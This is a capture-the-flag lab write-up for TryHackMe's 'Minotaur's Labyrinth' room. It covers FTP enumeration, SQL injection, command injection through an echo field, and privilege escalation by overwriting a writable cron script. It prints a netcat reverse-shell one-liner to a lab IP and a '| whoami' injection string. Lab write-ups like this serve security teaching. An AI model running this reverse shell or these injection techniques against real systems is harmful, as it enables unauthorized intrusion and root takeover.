Minotaur's Labyrinth

https://tryhackme.com/room/labyrinth8llv

Flag 1

Let's begin with a basic nmap scan

A more detailed scan:

We see there are a few open ports, let's start digging the ftp one since we have anonymous access

We can see a public folder named "pub", let's see whats inside and download its content

We couldn't download the .secret file because it's actually a folder

Let's download everything and take a look at the messages

We found the first flag and a couple messages. The first one tell us someone likes to keep things on a timer (cronjobs??) and the second one basically tell us to look everywhere. Nice info.

Flag 2

After taking a look at the ftp port let's head into port 80 and see what we can find. At first we can only see a login portal.

What if we try to retrieve informationg using the "Forgot Password" feature?

Apparently it won't be that easy so next step is looking at the source code and see if we find anything interesting. In the source code we find a javascript file named "login.js" if we open it we can see something juicy.

We can write a script to generate the password for Daedalus

Now let's try to log in with the generated password

We had success login to the portal. Taking a look we can see a search field that allows to search people and creatures. Let's try looking for Daedalus.

We get the user and the password. But we don't know any more users, let's take a look at the source code.

We found a comment saying something about the permissions. Let's see if the field is vulnerable to SQLi

After several failed tries we finally got the right payload and we retrieved the password hash for the user M!n0taur

Let's crack the hash and log in to the new account

We can see the second falg in the top navbar

User Flag

If we access to the "Scret_Stuff" folder we see a text field that will echo everything we write.

Let's try to scape the echo command with a basic " | whoami"

We were able to escape the command, now we can try to get a rev shell using base64 encoding

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.211.205 9001 >/tmp/f

We have to remove the "=" symbol to be able to get a reverse shell (based on the hint given in the box).

Don't forget to start a listener.

We're in, let's get the user flag.

Root Flag

After getting the user flag we just have to look around the box. We see uncommon folders in the / folder, remember one of the messages we downloaded in the beginning said someone likes to use timers and we see there's a "timers" folder, so let's head to that one.

We see there's a filed named "timer.sh" that can be writteng by our current user. Since the name is "timer" we're guessing it's a cronjob. Let's edit the content of the file with a reverse shell.

Let's save the changes and start a listener on port 9002

We got root.